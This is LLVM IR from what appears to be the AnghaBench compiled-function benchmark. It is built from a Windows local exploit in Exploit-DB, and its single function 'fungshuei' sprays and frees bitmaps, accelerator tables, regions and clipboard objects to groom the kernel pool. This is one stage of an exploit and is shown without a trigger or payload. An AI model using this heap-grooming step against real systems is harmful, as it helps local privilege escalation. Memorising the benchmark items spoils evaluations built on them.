; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows_x86-64/local/extr_41020.c_fungshuei.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows_x86-64/local/extr_41020.c_fungshuei.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@bitmaps = common dso_local global i32* null, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @fungshuei() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i64, align 8
  %6 = alloca i32*, align 8
  %7 = alloca i32*, align 8
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca i32, align 4
  %11 = alloca i32, align 4
  %12 = alloca i32, align 4
  %13 = alloca i32, align 4
  store i32 0, i32* %2, align 4
  br label %14

14:                                               ; preds = %24, %0
  %15 = load i32, i32* %2, align 4
  %16 = icmp slt i32 %15, 5000
  br i1 %16, label %17, label %27

17:                                               ; preds = %14
  %18 = call i32 @CreateBitmap(i32 1670, i32 2, i32 1, i32 8, i32* null)
  store i32 %18, i32* %1, align 4
  %19 = load i32, i32* %1, align 4
  %20 = load i32*, i32** @bitmaps, align 8
  %21 = load i32, i32* %2, align 4
  %22 = sext i32 %21 to i64
  %23 = getelementptr inbounds i32, i32* %20, i64 %22
  store i32 %19, i32* %23, align 4
  br label %24

24:                                               ; preds = %17
  %25 = load i32, i32* %2, align 4
  %26 = add nsw i32 %25, 1
  store i32 %26, i32* %2, align 4
  br label %14

27:                                               ; preds = %14
  %28 = call i64 @malloc(i32 4)
  store i64 %28, i64* %5, align 8
  %29 = load i64, i64* %5, align 8
  %30 = call i32 @SecureZeroMemory(i64 %29, i32 4)
  %31 = call i64 @malloc(i32 28000)
  %32 = inttoptr i64 %31 to i32*
  store i32* %32, i32** %6, align 8
  %33 = call i64 @malloc(i32 28000)
  %34 = inttoptr i64 %33 to i32*
  store i32* %34, i32** %7, align 8
  store i32 0, i32* %8, align 4
  br label %35

35:                                               ; preds = %53, %27
  %36 = load i32, i32* %8, align 4
  %37 = icmp slt i32 %36, 7000
  br i1 %37, label %38, label %56

38:                                               ; preds = %35
  %39 = load i64, i64* %5, align 8
  %40 = call i32 @CreateAcceleratorTableA(i64 %39, i32 1)
  store i32 %40, i32* %3, align 4
  %41 = load i64, i64* %5, align 8
  %42 = call i32 @CreateAcceleratorTableW(i64 %41, i32 1)
  store i32 %42, i32* %4, align 4
  %43 = load i32, i32* %3, align 4
  %44 = load i32*, i32** %6, align 8
  %45 = load i32, i32* %8, align 4
  %46 = sext i32 %45 to i64
  %47 = getelementptr inbounds i32, i32* %44, i64 %46
  store i32 %43, i32* %47, align 4
  %48 = load i32, i32* %4, align 4
  %49 = load i32*, i32** %7, align 8
  %50 = load i32, i32* %8, align 4
  %51 = sext i32 %50 to i64
  %52 = getelementptr inbounds i32, i32* %49, i64 %51
  store i32 %48, i32* %52, align 4
  br label %53

53:                                               ; preds = %38
  %54 = load i32, i32* %8, align 4
  %55 = add nsw i32 %54, 1
  store i32 %55, i32* %8, align 4
  br label %35

56:                                               ; preds = %35
  store i32 0, i32* %9, align 4
  br label %57

57:                                               ; preds = %67, %56
  %58 = load i32, i32* %9, align 4
  %59 = icmp slt i32 %58, 5000
  br i1 %59, label %60, label %70

60:                                               ; preds = %57
  %61 = load i32*, i32** @bitmaps, align 8
  %62 = load i32, i32* %9, align 4
  %63 = sext i32 %62 to i64
  %64 = getelementptr inbounds i32, i32* %61, i64 %63
  %65 = load i32, i32* %64, align 4
  %66 = call i32 @DeleteObject(i32 %65)
  br label %67

67:                                               ; preds = %60
  %68 = load i32, i32* %9, align 4
  %69 = add nsw i32 %68, 1
  store i32 %69, i32* %9, align 4
  br label %57

70:                                               ; preds = %57
  store i32 0, i32* %10, align 4
  br label %71

71:                                               ; preds = %76, %70
  %72 = load i32, i32* %10, align 4
  %73 = icmp slt i32 %72, 5000
  br i1 %73, label %74, label %79

74:                                               ; preds = %71
  %75 = call i32 @CreateEllipticRgn(i32 121, i32 121, i32 1, i32 1)
  br label %76

76:                                               ; preds = %74
  %77 = load i32, i32* %10, align 4
  %78 = add nsw i32 %77, 1
  store i32 %78, i32* %10, align 4
  br label %71

79:                                               ; preds = %71
  store i32 0, i32* %11, align 4
  br label %80

80:                                               ; preds = %90, %79
  %81 = load i32, i32* %11, align 4
  %82 = icmp slt i32 %81, 5000
  br i1 %82, label %83, label %93

83:                                               ; preds = %80
  %84 = call i32 @CreateBitmap(i32 82, i32 1, i32 1, i32 32, i32* null)
  store i32 %84, i32* %1, align 4
  %85 = load i32, i32* %1, align 4
  %86 = load i32*, i32** @bitmaps, align 8
  %87 = load i32, i32* %11, align 4
  %88 = sext i32 %87 to i64
  %89 = getelementptr inbounds i32, i32* %86, i64 %88
  store i32 %85, i32* %89, align 4
  br label %90

90:                                               ; preds = %83
  %91 = load i32, i32* %11, align 4
  %92 = add nsw i32 %91, 1
  store i32 %92, i32* %11, align 4
  br label %80

93:                                               ; preds = %80
  store i32 0, i32* %12, align 4
  br label %94

94:                                               ; preds = %99, %93
  %95 = load i32, i32* %12, align 4
  %96 = icmp slt i32 %95, 1700
  br i1 %96, label %97, label %102

97:                                               ; preds = %94
  %98 = call i32 @AllocateClipBoard2(i32 48)
  br label %99

99:                                               ; preds = %97
  %100 = load i32, i32* %12, align 4
  %101 = add nsw i32 %100, 1
  store i32 %101, i32* %12, align 4
  br label %94

102:                                              ; preds = %94
  store i32 2000, i32* %13, align 4
  br label %103

103:                                              ; preds = %119, %102
  %104 = load i32, i32* %13, align 4
  %105 = icmp slt i32 %104, 4000
  br i1 %105, label %106, label %122

106:                                              ; preds = %103
  %107 = load i32*, i32** %6, align 8
  %108 = load i32, i32* %13, align 4
  %109 = sext i32 %108 to i64
  %110 = getelementptr inbounds i32, i32* %107, i64 %109
  %111 = load i32, i32* %110, align 4
  %112 = call i32 @DestroyAcceleratorTable(i32 %111)
  %113 = load i32*, i32** %7, align 8
  %114 = load i32, i32* %13, align 4
  %115 = sext i32 %114 to i64
  %116 = getelementptr inbounds i32, i32* %113, i64 %115
  %117 = load i32, i32* %116, align 4
  %118 = call i32 @DestroyAcceleratorTable(i32 %117)
  br label %119

119:                                              ; preds = %106
  %120 = load i32, i32* %13, align 4
  %121 = add nsw i32 %120, 1
  store i32 %121, i32* %13, align 4
  br label %103

122:                                              ; preds = %103
  ret void
}

declare dso_local i32 @CreateBitmap(i32, i32, i32, i32, i32*) #1

declare dso_local i64 @malloc(i32) #1

declare dso_local i32 @SecureZeroMemory(i64, i32) #1

declare dso_local i32 @CreateAcceleratorTableA(i64, i32) #1

declare dso_local i32 @CreateAcceleratorTableW(i64, i32) #1

declare dso_local i32 @DeleteObject(i32) #1

declare dso_local i32 @CreateEllipticRgn(i32, i32, i32, i32) #1

declare dso_local i32 @AllocateClipBoard2(i32) #1

declare dso_local i32 @DestroyAcceleratorTable(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
